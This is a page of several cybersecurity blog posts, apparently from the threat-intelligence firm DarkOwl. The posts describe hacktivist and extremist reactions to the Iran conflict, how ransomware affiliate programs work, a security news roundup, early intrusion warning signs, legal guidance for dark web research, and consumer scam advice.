March 09, 2026

On 28 February 2026, the United States and Israel launched airstrikes against Iran targeting key military commanders, nuclear facilities, and government infrastructure. The attacks reportedly resulted in the death of Supreme Leader Ali Khamenei, along with several senior officials. Iran immediately retaliated using drones and missiles against U.S. bases in the region as well as targets in Israel. Missile strikes were also reported in Saudi Arabia, the UAE, and Qatar. The conflict continues to escalate, with the U.S. government reportedly pursuing regime change while Iran seeks to demonstrate regional military capability.

As these real-world events unfold, communities on the dark web and adjacent platforms have also reacted to the conflict. Some groups have participated in cyberattacks, others have provided commentary, and many have used messaging platforms such as Telegram to share real-time updates. This blog explores reactions observed across these ecosystems.

Hacktivist Groups

Hacktivist groups are online collectives or loosely organized networks that use hacking or disruptive digital tactics to promote a political, social, or ideological cause. These groups have become increasingly visible on platforms such as X (Twitter) and Telegram, where they seek notoriety for their activities, particularly during major geopolitical events such as the conflict in Ukraine and the October 7 attacks in Israel. The strikes against Iran have similarly prompted increased hacktivist activity.

Common attack types associated with hacktivist groups include:

• Distributed Denial of Service (DDoS) attacks: overwhelming a website or online service with large volumes of traffic, rendering it slow or unavailable to legitimate users.

• Website defacement: compromising a website and replacing its content with propaganda, slogans, threats, or political messaging.

• Data leaks: hackers steal and publish emails, documents, or internal files to embarrass or expose targeted organizations.

Although other types of cyber activity may occur, these represent the primary tactics observed among the hacktivist groups tracked by DarkOwl.

Another hacktivist group, Nation of Saviors, changed its Telegram profile image to depict the deceased Iranian Supreme Leader.

A Russian-affiliated hacktivist group known as Babayo Eror System began posting on 1 March, claiming attacks against U.S. and Israeli websites.

The group has also reposted content from Keymous+, a pro-Russian collective that has issued threats against Gulf states, arguing that these countries stand to benefit from U.S. and Israeli strikes on Iran. The group has framed these activities under the hashtag #Op_Epstein_Gulf, an apparent reference to disgraced financier Jeffrey Epstein.

While most hacktivist groups observed have focused primarily on DDoS attacks and website defacement, some are expanding their messaging to include references to potential targets and reported casualties. Additional information related to this activity is discussed later in this blog.

Many of these groups are also sharing videos and images related to the conflict, as well as commentary from politicians and public figures. While some of this content appears to be AI-generated, other material appears legitimate; however, the authenticity of these images and videos has not been independently verified. Some media also appears to be forwarded directly from news sources.

The mixture of authentic media, reposted news footage, and AI-generated imagery reflects a broader pattern of information amplification and narrative shaping commonly observed in hacktivist online ecosystems.

The group Z-BL4CX-H4T shared a video appearing to show a hanger filled with drones and followed this with posts listing countries they claimed Iran had successfully attacked.

The group also claimed that North Korea was supporting Iran in attacks against US and Israel affiliated sites.

News

As with previous conflicts, Telegram has become a major source of real-time information sharing. Numerous posts on the platform have circulated footage of missile strikes, images of military equipment, and updates from official organizations.

The Telegram channel ايران بالعربي (Iran in Arabic), which supports the Iranian government, shared images, and video footage of protests allegedly criticizing U.S. imperialism. The post claimed the protest took place in Stockholm, although DarkOwl has not verified the authenticity of these images.

The channel also shared images that appear to show people celebrating in the streets of Tehran.

As during the October 7 attacks, the IDF Telegram channel has been used to share official updates and warnings with Israeli citizens, including guidance on whether residents should take shelter.

News agencies have also circulated urgent warnings, identifying areas being targeted.

Additional videos circulating on Telegram appear to show damage from airstrikes in civilian areas. These images have not been independently verified by DarkOwl.

Other imagery shared on Telegram attempts to link the conflict in Iran with the ongoing war in Gaza.

Several groups associated with white supremacist ideology have also commented on the conflict.

One group stated that while they oppose Israel due to antisemitic beliefs, they also do not support Iran due to its Muslim identity, reflecting their ideological vision of a white, Christian ethno-state.

However, another Telegram channel shared an AI-generated image supporting Iran, which included both the Iranian flag and the Sonnenrad symbol, commonly associated with neo-Nazi and Atomwaffen-affiliated extremist groups.

This example highlights a broader trend in which ideological boundaries are increasingly blurred, particularly among groups linked to Nihilistic Violent Extremism (NVE).

Islamic Extremist & Jihadist Responses

DarkOwl monitors a range of Telegram and Rocket.Chat channels used by jihadist groups and their supporters, including communities linked to ISIS and al-Qaeda. Early reactions to the Israel–Iran conflict have emerged across these platforms.

A statement attributed to a group calling itself the Cyber Jihad Movement was identified on March 4, 2026, by counterterrorism researchers. The English-language document presents the group as an “IT organization linked to al-Qaeda” and calls on supporters to participate in what it describes as a “global cyber jihad.”

The statement encourages technically skilled supporters to conduct cyber operations targeting the governments and institutions of the United States, Israel, Pakistan, India, and several Arab countries, including cyberattacks designed to disrupt financial systems and government infrastructure.

The document also announces the group’s “entry” into the Iran–United States conflict and the Afghanistan–Pakistan conflict, expressing support for the Pakistani Taliban (TTP) and the Islamic Emirate of Afghanistan (Taliban).

While there is currently no public evidence of operational capability associated with the Cyber Jihad Movement, the messaging reflects ongoing attempts by jihadist-aligned actors to frame cyber activity as a legitimate extension of militant struggle.

Supporters of the Islamic State also discussed the conflict on an unofficial Rocket.Chat server historically used by IS sympathizers.

Users shared reactions to early reports of the conflict, often expressing hostility toward Iran and Shia Muslims.

Some users suggested that prolonged military pressure on Iran could create opportunities for expansion by Islamic State Khorasan Province (ISKP).

Some participants framed the conflict as validation of Islamic State narratives about its ability to challenge global powers.

Discussion on the server also revealed growing paranoia about infiltration by researchers and law enforcement, particularly following arrests linked to previous administrators of the community.

These conversations illustrate how jihadist communities interpret geopolitical events through ideological narratives while simultaneously dealing with internal distrust and operational pressure.

Iranian Aligned Militia Responses

Iranian-aligned militia groups across Iraq and the broader “Axis of Resistance” ecosystem have also used Telegram channels to shape narratives surrounding the conflict, combining operational claims, ideological messaging, and propaganda directed at regional and Western audiences.

Safwa Unit (Kata’ib Hezbollah)

The group وحدة الصفوة (Safwa Unit), which claims affiliation with Kata’ib Hezbollah, has circulated graphics identifying alleged Israeli targets, including Israeli officials and public figures.

The channel has also shared imagery commemorating individuals it describes as Hezbollah “martyrs.”

Such messaging blends propaganda and intimidation and reflects a broader pattern of militant-aligned channels using visual propaganda to signal potential targets while reinforcing narratives of resistance.

Ashab al-Kahf (PMF / Kata’ib Sarkhat al-Quds)

Another Telegram channel monitored by DarkOwl is أصحاب الكهف (Ashab al-Kahf), affiliated with Iraqi Popular Mobilization Forces (PMF) factions including Kata’ib Sarkhat al-Quds (كتائب صرخة القدس).

Recent posts on the channel have focused on the conflict and tensions involving U.S. forces.

One statement claimed responsibility for targeting a U.S. military base in Kuwait using drones, warning that operations would escalate.

Other posts emphasized ideological alignment with Iranian Supreme Leader Ali Khamenei, framing the conflict as part of a broader struggle against Western influence.

The channel also shared stylized propaganda imagery depicting Khamenei in militant imagery.

Taken together, this content illustrates how Iranian-aligned militia channels blend operational claims, ideological messaging, and propaganda to frame regional conflict narratives.

Conclusion

Communities across the dark web and adjacent platforms are actively reacting to the escalating conflict between Iran, Israel, and the United States. These reactions vary widely depending on the ideological orientation of each community.

Hacktivist groups have attempted cyberattacks against perceived adversaries; news channels have used Telegram to disseminate real-time updates, and extremist communities have leveraged the conflict to amplify propaganda narratives.

As the conflict continues to evolve, online discourse within these ecosystems will shift alongside real-world developments. DarkOwl will continue monitoring these platforms for emerging threats, cyber activity, and extremist messaging related to the conflict.

---

Follow us on LinkedIn to stay up to date.

March 5, 2026

Ransomware isn’t just malware, it is an operating model. Increasingly, ransomware groups as well as extorting victims themselves, have also operated “affiliate programs,” often called Ransomware-as-a-Service (RaaS). In this arrangement, a core team provides the tooling and brand, while affiliates conduct intrusions and share the proceeds with the owners of the malware.

This blog breaks down how the affiliate model works, why it persists, and which ransomware “brands” researchers most often associated with affiliate-driven operations in 2025.

What is a ransomware affiliate program?

A ransomware affiliate program is a partnership structure between a core operator group – usually developers and infrastructure maintainers – and affiliates which usually consist of intrusion teams who deploy ransomware and run extortion negotiations with the victim, with revenue typically split between them. Think of it as a criminal version of a platform business: the “platform” team builds and maintains the product (ransomware + infrastructure), while “partners” scale distribution (intrusions) in exchange for a share of profits.

The RaaS division of labor – who does what?

The core group are usually responsible for maintaining the ransomware codebase and continually updating it to evade defenses; they will also host negotiation portals, victim dashboards, and leak sites where victim data is shared on the dark web.

They will also provide “support” to affiliates by providing troubleshooting services, process guidance and other things to ensure that the affiliates are successful.

Affiliate programs usually have a strict set of rules on how the ransomware can be used. The core group sets these rules and enforces program rules; these usually cover who can target what, what tactics are allowed, and dispute handling.

The Affiliate groups are usually responsible for choosing targets and executing intrusions using the malware they are supplied by the core groups. They will also perform data theft and later-stage deployment steps, run negotiations, which can sometimes have operator oversight or supplied templates. They will also coordinate payment verification and handoff of decryption. However, this can vary by program with different groups having different practices and different revenue shares.

Although the core group and the affiliates are the main practitioners, other threat actors can also be involved in this ecosystem such as Initial Access Brokers (IABs) who sell access to compromised environments which the ransomware group or affiliates will then use to target victims. There can also be specialist roles for credential theft, phishing, negotiation, laundering, etc.

This separation makes attribution harder for researchers and explains why the same intrusion patterns can “carry over” even when a ransomware “brand” changes.

What affiliates “get” from the program

Most established RaaS operations provide a bundle that looks like a grim SaaS product, this can include Affiliate panels / dashboards to manage victims, builds, and negotiations, a standardized extortion workflow which can include victim instructions, negotiation playbooks, as well as product support. They will also be provided with access to leak site infrastructure, hosted on the dark web, to publish victim data and increase pressure. As well as being provided with all the tools, being an affiliate is an attractive prospect as it also provides brand credibility. A known “name” can increase perceived threat and victim payment rates. Not all ransomware groups are the same, and some have the reputation for being successful and or being able to target high profile victims.

The typical lifecycle

While the entry method differs by actor, many affiliate-run incidents follow a familiar lifecycle:

1. Initial Access: The threat actor will obtain access to the victim’s infrastructure commonly via stolen credentials, exposed services, or purchased access, from an initial access broker. Increasingly data leaked after a ransomware attack can be used to target a supply chain.
2. Data Theft: While traditionally ransomware encrypted data so the victim could not access it, that is not usually the case anymore with most actors simply exfiltrating as much data as they can from the victim. This data will then be used to extort the victim in the hope that the “ransom” will be paid to avoid the financial and reputational damage of having data shared on the dark web.
3. Encryption & Ransom: Some actors do still use an encryption method as part of their tactics, and in all cases will issue a ransom note which will provide details of their demands – usually payment in cryptocurrency. Many groups position themselves in these notes as researchers who are helping the victim avoid damage. Whether encryption occurs is sometimes secondary, the “business” is often extortion, not encryption.
4. Negotiation: Usually through the ransom note the victim is provided with a timeline in which to pay the ransom to avoid having their data released; this can also appear as a countdown on the darkweb leak site. The actors will often provide a portal for the victim to contact the threat actor, often on the dark web where negotiation can happen. As most victims do not disclose if they have paid the ransom or not, we do not have a clear picture of how these negotiations play out.
5. Payment or Leak: If the victim chooses to pay the ransom, they will be provided with a cryptocurrency address in which to make the payment to. They will be provided with a decryptor, if the data was actually encrypted and the victim’s name will be removed from the leak site. However, the fact that the victim appeared on the page and then removed can suggest payment was made and can still cause reputational damage.

Many 2025 “top group” lists rely on data-leak site postings as a proxy for activity, but it undercounts failed extortions, private settlements, and unposted victims. Furthermore, as the data has been exfiltrated, there is no guarantee that making the payment means the data will not be released at some point. If the payment is not made, the data will be made available for download on the leak site.

How the money works: revenue share + trust problems

Affiliate programs need incentives and mechanisms to manage distrust and also to attract “good” actors to run operations. The programs usually work on the basis of revenue splits, where the affiliate keeps the larger portion, and operators take a platform fee.

Affiliates will often choose a ransomware brand that has not only had public success but also that are perceived as reliable payers. They may work with multiple groups. RaaS operators compete for affiliates with better splits, better support, more stable infrastructure, and broader “brand” recognition.

However, the core group can also be picky about who they work with, some groups are reported to only work with affiliates from certain countries and will set up their systems in a way to avoid exit scams, where operators steal all of the proceeds and do not pay the platform fee.

Takedowns, leaks, and internal conflicts lead can lead to splits, rebrands, and “new” groups that may be continuity operations rather than truly new actors. When a brand is disrupted, affiliates don’t disappear; they migrate, bringing tradecraft and victim targeting patterns with them.

Main ransomware brands commonly linked to affiliate-driven activity

Below are ransomware “brands” reported to be operating in an affiliate-friendly or RaaS-like manner. This is not exhaustive, and “brand” ≠ a single consistent team.

All of these groups are tracked by DarkOwl, with their leak sites being closely monitored for new victims.

Conclusion

Ransomware affiliate programs persist because they’re efficient; they turn a complex criminal operation into a repeatable platform. In 2025, the most important researcher takeaway isn’t just which brand is “on top,” but how affiliates move, how brands compete for them, and how extortion infrastructure evolves across disruptions.

---

Learn how DarkOwl tracks these groups and more. Contact us.

March 02, 2026

Our analyst team shares a few articles each week in our email newsletter which goes every Thursday. Make sure to register! This blog highlights those articles in order of what was the most popular in our newsletter – what our readers found the most intriguing. Stay tuned for a recap every month. We hope sharing these resources and news articles emphasizes the importance of cybersecurity and sheds light on the latest in threat intelligence.

1. Mandiant Finds ShinyHunters-Style Vishing Attacks Stealing MFA to Breach SaaS Platforms – The Hacker News

On January 31, Mandiant reported a newly identified expansion in threat activity involving tactics similar to those used by ShinyHunters. These attacks employ voice phishing (vishing) and credential-harvesting websites that impersonate targeted organizations, enabling attackers to obtain single sign-on (SSO) credentials and multi-factor authentication (MFA) codes to gain unauthorized access to victim environments. Mandiant’s threat intelligence team said it is monitoring the activity across several clusters, UNC6661, UNC6671, and UNC6240 (ShinyHunters), to account for the possibility that these groups are evolving their tactics or imitating previously observed methods. Read full article.

2. Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks – BleepingComputer

CISA flagged a critical SolarWinds Web Help Desk (WHD) vulnerability, CVE-2025-40551, that is now being exploited by unknown hackers. Using legitimate tools, such as Zoho ManageEngine, threat actors were able to target organizations and maintain persistent, hands-on access to compromised environments. Following initial access, attackers installed the Zoho ManageEngine Assist agent from an MSI hosted on the Catbox file-sharing platform, configured it for unattended access, and registered the affected host with a Zoho Assist account created using an anonymous Proton Mail address. Article here.

3. FBI seizes RAMP cybercrime forum used by ransomware gangs – BleepingComputer

On January 28, it was discovered the FBI had seized RAMP, a Russian cybercrime forum, that advertised malware and hacking services. Both the forum’s Tor site and its Clearnet domain, ramp4u[.]io, have been taken offline and now show a seizure banner declaring, “The Federal Bureau of Investigation has seized RAMP.” According to the notice, “This action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice,” indicating a multi-agency effort behind the takedown. RAMP administrator “Stallman” acknowledged the takedown in a message on XSS, adding that he has no plans to create a successor platform. Read more here.

4. Chinese hackers exploiting Dell zero-day flaw since mid-2024 – BleepingComputer

Chinese state hacking group, UNC6201, is believed to be behind a zero-day exploitation of  in Dell RecoverPoint for Virtual Machines, tracked as CVE-2026-22769. The high-risk vulnerability has been exploited since May 2024 and shows persistent access of the malware SLAYSTYLE and BRICKSTORM. Additionally, UNC6201 deploys a newly identified malware called Grimbolt, which leverages a technique that is faster and more difficult to analyze than BRICKSTORM. Google Threat Intelligence Group (GTIG) has not confirmed an initial access vector, but previous attacks connected to UNC6201 indicate a possible target of edge appliances for initial access. Read here.

6. One threat actor responsible for 83% of recent Ivanti RCE attacks – BleepingComputer

Recent threat intelligence observations link one threat actor to two critical vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM). According to GreyNoise Threat Research team, between February 1st and 9th the EPMM experienced 417 observed exploitation sessions. Of those 417, 83% of observed exploitation can be tracked to a single IP address (193.24.123.42) on bulletproof infrastructure. The activity is designed to trigger a DNS callback to a unique subdomain controlled by the tester. This approach allows threat actors to confirm that their command was successfully executed without needing a direct response from the target system. Read full article.

7. Sandworm hackers linked to failed wiper attack on Poland’s energy systems – BleepingComputer

In late December 2025, the Russian state sponsored hacking groups, Sandworm, attempted to deploy a destructive “data-wiping malware” called DynoWiper against Poland’s power grid. Polish officials have claimed the attack “targeted two combined heat and power plants as well as a management system used to control electricity generated from renewable sources such as wind turbines and photovoltaic farms.” Officials also stated that their current “systems in place” were able to prevent the attack but gave minimal additional information. Read full article.

8. China-Linked Amaranth-Dragon Exploits WinRAR Flaw in Espionage Campaigns – The Hacker News

Throughout 2025, Amaranth-Dragon, a China-linked threat actor has been connected with new cyber espionage campaigns targeting government and law enforcement in Southeast Asia. Threat actors abused a now-patched security vulnerability (CVE-2025-8088) in RARLAB WinRAR, which permits arbitrary code execution upon opening a specially crafted archive.  Although the exact method of initial access is still unclear, the highly targeted nature of the campaigns and the use of customized lures tied to regional political, economic, or military events strongly suggest spear-phishing. In these attacks, emails likely delivered archive files hosted on trusted cloud services such as Dropbox, helping attackers appear legitimate and evade traditional perimeter defenses. Learn more.

---

Make sure to register for our weekly newsletter to get access to what our analysts are reading on a weekly basis.

February 26, 2026

Cyberattacks rarely occur on impact. There are often early warning signals.

Long before ransomware detonates, credentials are stolen and sold, meaning data is quietly being exfiltrated from the system. Meaning there are indicators. Slight behavior shifts. Fragments of telemetry that, viewed individually, look harmless. Viewed as a collective, they tell a story.

Most organizations do not fall victim because they lack tools. They become victims because they lose or dismiss early warning signals as noise.

If you want to interrupt an attack before it becomes an incident, you have to know what to look for and you have to treat weak signals seriously.

1. Identity Anomalies that Do Not Make Sense

Identity is the primary control plane in modern environments. According to the 2024 Verizon Data Breach Investigations Report, the majority of breaches continue to involve the human element, including stolen credentials and social engineering.

Early warning signs often appear in authentication telemetry before anything else.

Look for:

• Repeated failed logins followed by a successful login from the same account
• Logins from atypical geographies or impossible travel scenarios
• Dormant accounts suddenly becoming active
• Privilege escalation requests that do not align with job functions

These are not necessarily breaches. But they are often precursors.

Adversaries frequently test credentials quietly before operationalizing access. The MITRE ATT&CK framework documents techniques such as credential stuffing, password spraying, and valid account abuse under Initial Access and Persistence tactics.

If identity behavior shifts, assume it is meaningful until proven otherwise.

2. MFA Fatigue and Push Bombing

Multifactor authentication is not invincible. Attackers increasingly exploit user behavior instead of cryptographic weaknesses.

Push bombing, also known as MFA (multifactor authentication) fatigue, floods a user with repeated authentication prompts until they approve one out of frustration or confusion. The Cybersecurity and Infrastructure Security Agency has published guidance highlighting this growing tactic.

Early warning indicators include:

• Multiple MFA prompts within short time periods
• Authentication approvals outside normal working hours
• Users reporting repeated push requests they did not initiate

When a user comments, “I keep getting login prompts even though I’m not trying to sign in” that’s not a help desk or internal IT nuisance. It’s an intrusion attempt in progress.

3. Unexpected Changes in Account Permissions

Privilege creep happens naturally over time. Attack driven privilege escalation looks different.

Take notice when you see:

• Service accounts added to privileged groups without change control documentation
• Administrative roles assigned temporarily and never revoked
• API keys created outside normal deployment pipelines

The 2023 IBM Cost of a Data Breach Report noted that organizations with mature identify and access management practices experienced significantly lower breach costs compared to those without.

Access to expansion without operational justification is rarely accidental. It is often reconnaissance or staging.

4. Anomalous Network Behavior that is Subtle

Before large scale data exfiltration occurs, the threat actors have already mapped out the environment. They enumerate systems, prob for open ports, and test lateral movements before escalations.

Signals to look for:

• Internal port scanning from a user workstation
• Lateral traffic patterns that do not match baseline behaviors
• DNS queries to newly registered or suspicious domains

According to the 2024 CrowdStrike Global Threat Report, adversaries continue to reduce breakout times, meaning the time between initial access and lateral movement can be quite short.

If your only alerts are on large data transfers, you may be waiting to react until it’s already at the end of the story. Early detection means paying attention to reconnaissance.

5. Endpoint Drift and Security Control Tampering

Attackers frequently attempt to disable security tooling before executing payloads.

Warning signals include:

• Endpoint detection agents being stopped or uninstalled
• Logging services disabled or modified
• Registry or system configuration changes affecting security posture

Again, the MITRE ATT&CK technique Impair Defenses specifically outlines how adversaries disable or modify security tools to evade detection.

If telemetry goes dark unexpectedly, treat that as an alert, not as an inconvenience.

6. Dark Web Mentions of Corporate Assets

Not all early signals originate inside your environment.

Compromised credentials, exposed API keys, and proprietary data often appear on underground forums and marketplaces before being weaponized at scale. Proactive darknet monitoring can identify leaked corporate emails, password dumps, and access listings tied to your organization.

Routinely monitoring for credential exposure and enforcing password resets and token revocation when compromise is suspected.

External signals can provide a critical time advantage.

7. User Behavior that Feels Off

Security telemetry is critical. So is human intuition.

Sometimes employees notice:

• Suspicious emails that somehow bypassed filters
• Files appearing in a shared drive that no one claims ownership of
• Systems behaving slower or differently than usual

Encouraging reporting without penalty. The 2024 Verizon DBIR emphasizes that human reporting remains a key detection source for many incidents.

If your culture discourages raising small concerns, you will only hear about problems when it is too late.

Why Weak Signals Matter

Attackers operate in stages. Initial access. Persistence. Privilege escalation. Lateral movement. Exfiltration. Impact.

Each and every stage generates signals.

Organizations that wait for definitive proof of compromise are often responding during the Impact phase. At that point, containment becomes expensive and public.

Early warning detection shifts the timeline left.

It creates opportunities to:

• Reset credentials before privilege escalation
• Isolate endpoints before ransomware deployment
• Revoke tokens before data exfiltration

The financial implications are significant. IBM reports that organizations that identified and contained breaches under 200 days save substantially compared to those with longer dwell times.

Speed matters. However, speed cannot increase without signal recognition.

Building an Early Warning Discipline

Recognizing early indicators is not about being paranoid. It is about pattern awareness and pattern detection.

Practical steps include:

• Baseline normal behaviors across identity, network, and endpoint telemetry
• Correlate weak signals across multiple control layers
• Treat identity anomalies as high priority events
• Integrate darknet monitoring into threat intelligence workflows
• Encourage user reporting and close the feedback loop.

You will never be able to eliminate all risks. The goal is to reduce attackers’ dwell time.

Cyberattacks rarely occur unannounced. The warnings are just whispers, not shouts.

Organizations need to learn to listen to those whispers and how to act before they become a crisis.

---

Learn how. Contact us.

February 24, 2026

Introduction

Dark web research remains a difficult domain. It is essential for uncovering illicit activity, yet fraught with ethical, operational, and legal complications. Unlike traditional threat intelligence work, dark web investigations often require some level of immersion in communities built on illicit activity and therefore requires its own set of rules and practices.

While DarkOwl Vision allows researchers to safely search and monitor the dark web without embarking on these complications, it is important to understand what the ethical and legal best practices are and what guidelines need to be followed and are followed by DarkOwl analysts.

This blog explores the key ethical and legal tensions, maps them against the DOJ’s (Department of Justice) guidance, and offers practical considerations for responsible dark web research.

DOJ’s 2020 Guidance

In February 2020, the DOJ’s Cybersecurity Unit released a guidance document titled Legal Considerations when Gathering Online Cyber Threat Intelligence and Purchasing Data from Illicit Sources.

This is the guidance in the US for which dark web research and interactions should comply with. The guidance is aimed at companies and security firms who engage in online threat intelligence gathering; this includes monitoring dark web forums, marketplaces, or purchasing data, malware, or exploit information offered in “dark markets.” The goal of the guidance is to help analysts assess their potential exposure under federal criminal law when participating in certain activities or the purpose of their research. It particularly focuses on accessing, purchasing, or using illicitly obtained data.

However, the document is not legally binding, and it does not create rights or immunity from prosecution. And it does not address all use cases and activities. For example, it explicitly does not purport to deal with every scenario (e.g., child-pornography forums or illicit drug markets may involve additional legal issues).

The guidance recommends private actors who do more than “passive monitoring” (e.g., active communication, purchasing) to:

1. create a written operational plan or “rules of engagement”
2. keep records of how data is collected and used
3. work with legal counsel before engaging in risky activities

Let’s explore some of the specific activities the guidance covers and what best practices should be.

Passive Monitoring

According to the DOJ, passive monitoring of publicly accessible dark web forums or marketplaces (reading, collecting posts, observing patterns) “poses little risk of federal criminal liability,” provided the researcher does not exploit vulnerabilities or misuse credentials.

Best practice: still maintain documentation — e.g., record what tools you used (crawler, VPN, etc.), what forums you monitored, timestamps, and your research purpose. DarkOwl Vision does this for you, so you don’t have to.

Active Participation, Purchasing Data, or Engaging on Forums

Per DOJ guidance, active communication, use of unauthorized credentials (stolen credentials), or purchase of stolen data or malware can trigger liability under federal statutes. Therefore, any of these actions need to be undertaken with extreme caution and legal advice. While researchers can create fake personas, or sock puppets, they cannot use third-party or stolen credentials to access sites. Creating sock puppets does not guarantee immunity and should be done in compliance with company policy and with documentation of what was created and for what.

Purchasing data is a very risky area; it is a must that you have proper legal authorization in place before purchasing any data. This should only be done in a “defensive” way, buying back your own data, for example. However, you must make sure that you evidence that there is no criminal intent and document the reason for purchasing the data. Legal review is essential, as well as clear and thorough documentation.

This is not just a legal matter, however. Ethically we want to ensure that we are not supporting the criminal ecosystem by providing funds to threat actors that could be used for further attacks in the future. This is why DarkOwl never buys data.

If analysts need to interact directly on the dark web, the following practices are recommended:

• Passive monitoring only (no purchases, no unauthorized credentials)
• Maintain written operational plan and rules of engagement
• Keep full logs and records of activity (what, when, why)
• Seek legal counsel before any active engagement (purchase, communication, exploit use)
• Minimize or avoid storing sensitive/stolen data; prefer metadata or anonymized indicators
• If publishing, treat attribution as probabilistic; avoid definitive claims without strong evidence
• Avoid methodologies that exploit vulnerabilities or unauthorized access to private systems/services

Conclusion

With the release of DOJ’s 2020 guidance, dark web research is no longer a completely lawless frontier for private researchers — but neither is it risk-free or ethically trivial. The guidance provides a valuable baseline for lawful behavior, but it should be treated as a floor, not a ceiling. Ethical, responsible research demands transparent documentation, strict adherence to “least-impact” principles (passive monitoring, data minimization), and legal review before engaging in higher-risk activities.

---

DarkOwl is the leader in darknet data. Contact us to learn how we can help with your research and monitoring.

February 18, 2026

In an era of data breaches and constant headlines focused on “security” topics, “security” has become a catch-all term. While the terms cyber security and information security are often used interchangeably, it is important to acknowledge that they focus on different areas – they are related, but their scope differs. In this blog, we will explore how they differ in scope, focus, and application.

Information Security Vs Cybersecurity

To start, information security (infosec) can be thought of as an umbrella term, while cybersecurity is a specialization underneath that umbrella. Using the terms interchangeably can lead to gaps in your defense strategy as cyber security focuses on the digital realm, while information security protects data in all forms.

Information Security

Information Security is the broad practice of protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction. This includes both data in the digital realm, as well as physical data (think of a file on your computer and a file in your filing cabinet). The goal of information security is to protect the CIA Triad (note that since cybersecurity is a subset of information security, these goals align to cybersecurity as well – the scope is just more specific). The CIA Triad stands for confidentiality, integrity, and availability:

• Confidentiality: is your sensitive information only accessible to those authorized to see it?
  • Common Threats: phishing, man in the middle attacks, human error
• Integrity: is your data authentic, accurate, and reliable?
  • Common Threats: man in the middle attacks, human error, malware, hardware/software glitches
• Availability: are the systems, networks, and data up and running whenever authorized users need them?
  • Common Threats: distributed denial of service attacks, hardware failure, ransomware, natural disaster

Examples of information security would be the practice of shredding sensitive paper documents, office keycard systems, and encryption policies. Threats against strong information security include theft, natural disasters, and physical breaches.

Cybersecurity

Cybersecurity is the practice of defending computers, servers, mobile devices, electronic systems, networks, and data from malicious digital attacks. If it involves the internet or a digital network, it’s cybersecurity. In the example above, cybersecurity is the data in the digital realm – a file on your computer (and the systems, networks, and hardware that house it). The goal in cybersecurity is to protect against cyber attacks – hacking, malware, phishing – to name a few. Examples of cybersecurity would be firewalls, antivirus software, and securing “Internet of Things” (IoT) devices. Threats against secure cybersecurity include cyber warfare, hacking, and data breaches.

How They Work Together

Security is a holistic culture, not just a software update. Information security and cybersecurity work together in creating overlapping layers of defense. You cannot have a robust security policy without incorporating both: the physical and digital layers of defense and policies covering both.

For example, infosec would set the overall policy of protecting and encrypting data (business level decision based on risk), while the cybersecurity division would implement the tech to do so (firewalls, encryption, multi-factor authentication, etc). In a situation where a breach or attack does happen, the two have distinct roles but cannot be successful without the other:

• Information Security
  • Determines the data that was stolen
  • Manages the legal and regulatory fallout (GDPR/HIPAA notifications)
  • Initiates the Business Continuity Plan to ensure the company stays operational during the cleanup
• Cyber Security
  • Identifies the threat details
  • Isolates the issue and stops it from continuing
  • Patches the vulnerability that the hacker used

In short, cybersecurity handles the threats (hackers, viruses, bots) while information security handles the risks (legal compliance, physical safety, data integrity).

Best Practices

With so many of us working from home, it is important to practice good daily security hygiene to make sure that not only the digital data of your company is safe, but potential physical risks are minimized as well. Below is a checklist covering the digital and physical bases to ensure your data stays private and your hardware stays safe:

Digital Checklist (Cybersecurity):

Protect your devices and network from remote attacks.

• Secure the Router:
  • Change the default admin password
  • Enable WPA3 (or WPA2-AES) encryption
  • Turn off WPS (Wi-Fi Protected Setup
• Segment Your Wi-Fi:
  • Set up a “Guest Network” specifically for your work laptop
    • This keeps your work data separate from “unsecure” items like an Amazon Alexa or gaming console
• Enable MFA/2FA:
  • Use an authenticator app (like Google Authenticator or Authy) on every account
• Automate Updates:
  • Set your OS (Operating System) and browser to “Auto-Update” so you get security patches immediately
• VPN for Public Use:
  • Use a reputable VPN to create an encrypted “tunnel” for your data

InfoSec Checklist:

Protect the physical environment and the data itself.

• Full Disk Encryption:
  • Ensure BitLocker (Windows) or FileVault (Mac) is on
• The “Clear Desk” Policy:
  • Don’t leave passwords on sticky notes
  • Shred any documents containing client names, addresses, or account numbers before throwing them away
• Visual Privacy:
  • Use a privacy screen filter on your monitor
• Secure Backup (3-2-1 Rule):
  • Keep 3 copies of your data:
    • 2 different types of media (laptop and an external drive)
    • 1 copy stored off-site (encrypted cloud storage like Backblaze or iCloud)
• Webcam Cover:
  • Have a physical slide cover for your camera is the only 100% guarantee against “cam-fecting”
• Lock your computer when you step away

---

February 12, 2026

Love is in the air and unfortunately, so are scams. With Valentine’s Day on the horizon, cybercriminals are preparing to exploit unsuspecting victims through a variety of deceptive tactics. Emotional vulnerability and digital trust often make this season especially appealing to scammers.

While threat actors continue to rely on familiar scams, this holiday uniquely lends itself to romance-based schemes. As people become more open to meeting and connecting with strangers online, cybercriminals gain new opportunities to exploit unsuspecting victims. The following provides an overview of prevalent scams and guidance on how consumers can protect themselves during the season of love.

Romance Scams & Fake Dating Profiles

Romance scams are designed to exploit emotions before finances. In these schemes, criminals deliberately build affection and trust with their victims to gain access to money or sensitive personal identifying information (PII). Scammers typically seek out targets on dating apps, social media platforms, and singles websites, often posing as someone they are not. Using a carefully crafted fake persona, they engage in tactics such as “love bombing,” overwhelming the victim with attention and affection to quickly create an emotional bond. Once trust is firmly established, the scammer begins to request money or financial help, frequently citing urgent or fabricated emergency situations.

Romance scams and other confidence schemes account for some of the highest financial losses among Internet-facilitated crimes. Data from the FBI’s Internet Crime Complaint Center indicate that in 2023, the most recent year for which statistics are available, approximately 18,000 victims reported losses totaling nearly $700 million.

Fake Florist Sites

Like many fraudulent retail websites, fake floral sites are used by scammers to deceive consumers, particularly during holidays when demand for floral arrangements is high. These sites will capitalize on individuals making last minute purchases by mimicking legitimate sites and luring unsuspecting shoppers. To enhance their credibility, they frequently run fake social media ads that direct victims to counterfeit pages, adding a false sense of legitimacy to the scam.

Victims have reported that some sites will fulfill the order, but the quality will be lacking, or the items are damaged. While other victims claim the flowers were never delivered and the shop becomes unreachable.

How to Protect Yourself:

• Double check website URLS.
• Examine reviews on the website to see possible complaints from victims or unsatisfied customers.
• If possible, use secure payment methods that offer fraud protection.

Event and Ticket Scams

